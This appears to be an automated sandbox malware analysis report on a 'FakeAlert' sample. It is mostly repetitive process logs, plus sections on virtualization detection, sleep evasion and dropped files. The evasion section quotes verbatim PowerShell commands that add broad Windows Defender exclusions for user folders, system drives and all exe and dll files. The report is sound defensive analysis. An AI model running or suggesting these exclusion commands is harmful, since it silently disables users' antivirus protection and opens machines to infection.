                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Tries to detect virtualization through RDTSC time measurements
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeRDTSC instruction interceptor: First address: 000000000310E555 second address: 000000000310E555 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F0604C38FC6h 0x00000006 cmp al, 87h 0x00000008 inc ebp 0x00000009 test edx, ebx 0x0000000b inc ebx 0x0000000c rdtsc
                                Contains functionality to detect sleep reduction / modifications
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00435BD46_2_00435BD4
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_00435BD49_2_00435BD4
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_00435BD412_2_00435BD4
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6424Thread sleep count: 5521 > 30Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6412Thread sleep count: 695 > 30Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6520Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6468Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7164Thread sleep time: -840000s >= -30000sJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6832Thread sleep count: 1488 > 30Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6896Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6868Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5521Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 695Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1488Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeAPI coverage: 7.5 %
                                Source: C:\ProgramData\Synaptics\Synaptics.exeAPI coverage: 5.8 %
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_00435BD412_2_00435BD4
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00435BD46_2_00435BD4
                                Source: C:\ProgramData\Synaptics\Synaptics.exeDropped PE file which has not been started: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeJump to dropped file
                                Source: C:\ProgramData\Synaptics\Synaptics.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RCXF979.tmpJump to dropped file
                                Source: C:\ProgramData\Synaptics\Synaptics.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RCXDA77.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,6_2_00458EA4
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,12_2_00458EA4
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeAPI call chain: ExitProcess graph end nodegraph_7-4484
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeAPI call chain: ExitProcess graph end nodegraph_7-4265
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00426548 GetSystemInfo,6_2_00426548
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,6_2_004099E0
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,6_2_00406018
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00409B1C FindFirstFileA,GetLastError,6_2_00409B1C
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeCode function: 7_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_00405D74
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeCode function: 7_2_0040290B FindFirstFileW,7_2_0040290B
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeCode function: 7_2_0040699E FindFirstFileW,FindClose,7_2_0040699E
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,9_2_004099E0
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_00409B1C FindFirstFileA,GetLastError,9_2_00409B1C
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,9_2_00406018
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,12_2_00406018
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,12_2_004099E0
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_00409B1C FindFirstFileA,GetLastError,12_2_00409B1C
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_004730FC LoadLibraryA,GetProcAddress,SHGetSpecialFolderLocation,SHGetPathFromIDList,SHGetSpecialFolderLocation,SHGetPathFromIDList,6_2_004730FC
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_00422BCC VirtualAlloc,LdrInitializeThunk,LdrInitializeThunk,9_2_00422BCC
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeCode function: 0_2_004014A5 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit,0_2_004014A5

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                Adds a directory exclusion to Windows Defender
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exitJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\uniformerede.exe "C:\Users\user\AppData\Local\Temp\uniformerede.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeProcess created: C:\Users\user\Desktop\._cache_uniformerede.exe "C:\Users\user\Desktop\._cache_uniformerede.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00473490 ShellExecuteEx,Sleep,WaitForSingleObject,6_2_00473490
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,6_2_004061D0
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: GetLocaleInfoA,GetACP,6_2_0040E088
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,6_2_004062DC
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: GetLocaleInfoA,6_2_0040C964
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: GetLocaleInfoA,6_2_0040C9B0
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: GetLocaleInfoA,6_2_00406AC6
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: GetLocaleInfoA,6_2_00406AC8
